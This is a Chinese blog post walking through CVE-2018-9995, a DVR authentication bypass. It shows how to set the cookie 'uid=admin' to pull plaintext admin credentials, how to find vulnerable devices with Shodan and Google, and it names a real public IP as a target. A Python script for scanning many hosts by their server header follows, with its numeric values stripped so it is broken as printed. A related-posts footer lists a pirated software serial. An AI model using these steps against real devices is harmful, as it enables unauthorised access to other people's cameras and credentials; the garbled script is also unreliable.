首页 技术 正文
技术 2022年11月23日
0 收藏 640 点赞 3,063 浏览 930 个字

DVR登录绕过漏洞_CVE-2018-9995漏洞复现

一、漏洞描述

此漏洞允许攻击者通过修改”Cookie:uid=admin”之后访问特定DVR的控制面板,返回此设备的明文管理员凭证。

二、影响软件以及版本

Novo

CeNova

QSee

Pulnix

XVR 5 in 1 (title: “XVR Login”)

Securus, – Security. Never Compromise !! –

Night OWL

DVR Login

HVR Login

MDVR Login

三、漏洞复现

1、搜索引擎获取有可能存在漏洞的设备

使用shodan、google等搜索引擎

  DVR登录绕过漏洞_CVE-2018-9995漏洞复现

  DVR登录绕过漏洞_CVE-2018-9995漏洞复现

2、访问http://114.33.109.175/login.rsp

  DVR登录绕过漏洞_CVE-2018-9995漏洞复现

3、burp抓包,构造poc,放包发现获得登录凭证

  DVR登录绕过漏洞_CVE-2018-9995漏洞复现

4、使用获得账户密码登录,成功登录

  DVR登录绕过漏洞_CVE-2018-9995漏洞复现

5、批量检查是否存在CVE-2018-9995漏洞(poc),脚本如下

import sys
import requests
import redef check_host(host): try: print("Checking : %s"%host) url = 'http://' + host+'/login.rsp' rr= requests.get(url,timeout=,allow_redirects=False) if rr.status_code == and re.findall("GNU rsp/1.0", rr.headers["Server"]): print("[*] CVE-2018-9995 Detection :Url is %s"%url) ff=open('result.txt','a+') ff.write('%s\n'%(url)) except: passif __name__ == '__main__': if len(sys.argv) < : print("""Usage: Python3 CVE-2018-9995.py host.txthost.txt:127.0.0.1: or baidu.com""") if len(sys.argv) >= : file = open(sys.argv[]) for i in file: i = i.strip() check_host(i) file.close()

6、运行脚本

  DVR登录绕过漏洞_CVE-2018-9995漏洞复现

相关推荐
python开发_常用的python模块及安装方法
adodb:我们领导推荐的数据库连接组件bsddb3:BerkeleyDB的连接组件Cheetah-1.0:我比较喜欢这个版本的cheeta…
日期:2022-11-24 点赞:878 阅读:8,954
Educational Codeforces Round 11 C. Hard Process 二分
C. Hard Process题目连接:http://www.codeforces.com/contest/660/problem/CDes…
日期:2022-11-24 点赞:807 阅读:5,479
下载Ubuntn 17.04 内核源代码
zengkefu@server1:/usr/src$ uname -aLinux server1 4.10.0-19-generic #21…
日期:2022-11-24 点赞:569 阅读:6,291
可用Active Desktop Calendar V7.86 注册码序列号
可用Active Desktop Calendar V7.86 注册码序列号Name: www.greendown.cn Code: &nb…
日期:2022-11-24 点赞:733 阅读:6,108
Android调用系统相机、自定义相机、处理大图片
Android调用系统相机和自定义相机实例本博文主要是介绍了android上使用相机进行拍照并显示的两种方式,并且由于涉及到要把拍到的照片显…
日期:2022-11-24 点赞:512 阅读:7,740
Struts的使用
一、Struts2的获取  Struts的官方网站为:http://struts.apache.org/  下载完Struts2的jar包,…
日期:2022-11-24 点赞:671 阅读:4,774